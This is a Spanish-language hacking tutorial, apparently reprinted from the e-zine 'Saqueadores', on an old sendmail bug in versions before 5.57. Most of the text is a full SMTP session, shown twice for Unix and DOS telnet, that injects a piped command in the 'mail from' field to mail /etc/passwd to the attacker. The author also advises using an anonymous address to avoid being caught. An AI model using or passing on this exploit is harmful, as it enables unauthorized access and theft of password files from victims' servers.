El bug del que voy a hablar no es muy espectacular. Ademas es un poco antiguo con lo que seguramente no funcionara en la mayoria de las maquinas.
Lo que hace este bug, es permitir que enviando un comando en la linea del sendmail puedas conseguir que el fichero de passwords sea enviado a tu direccion de correo. (Por eso es conveniente usar una direccion anonima para no ser pillado)
------------------------------------------------------------------------------
Sistemas: Unix's en general, espacialmente AIX y SUNOS Versiones: Sendmail, versiones anteriores a la 5.57 Descripcion: Bug del sendmail Ejemplo: en unix o linux
saqland % telnet victima.com 25 Trying 128.128.128.1... Connected to victima.com Escape character is '^]'. 220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd" 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok rcpt to: loquequieras 550 loquequieras... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. saqland %
Ejemplo: Conexion desde DOS o Windows y otros
Con un programa de telnet conecta a este url -> victima.com:25 o si se puede configurar en los menus configuralo para que la conexion se haga al puerto 25, que es el del sendmail.
220 victima.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail tu_direccion@de_correo.com < /etc/passwd" 250 "|/bin/mail tu_direccion@de_correo.com < /etc/passwd"... Sender ok rcpt to: loquequieras 550 loquequieras... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit
Notas: -victima.com = nombre del ordenador a hackear -saqland = nombre de nuestro ordenador -Lo que aparece con un numero delante son mensajes de nuestra victima, el resto es lo que tienes que escribir. -Aprende a usar bien el programa de telnet, porque es el que mas usaras a la hora de hackear.
Sacado de la revista Saqueadores:
- BBS CLUB MURCIA 968-201819 y 968-201262
- y en internet en http://www.geocities.com/SiliconValley/park/7574/
- o en esta direccion: eljaker@hotmail.com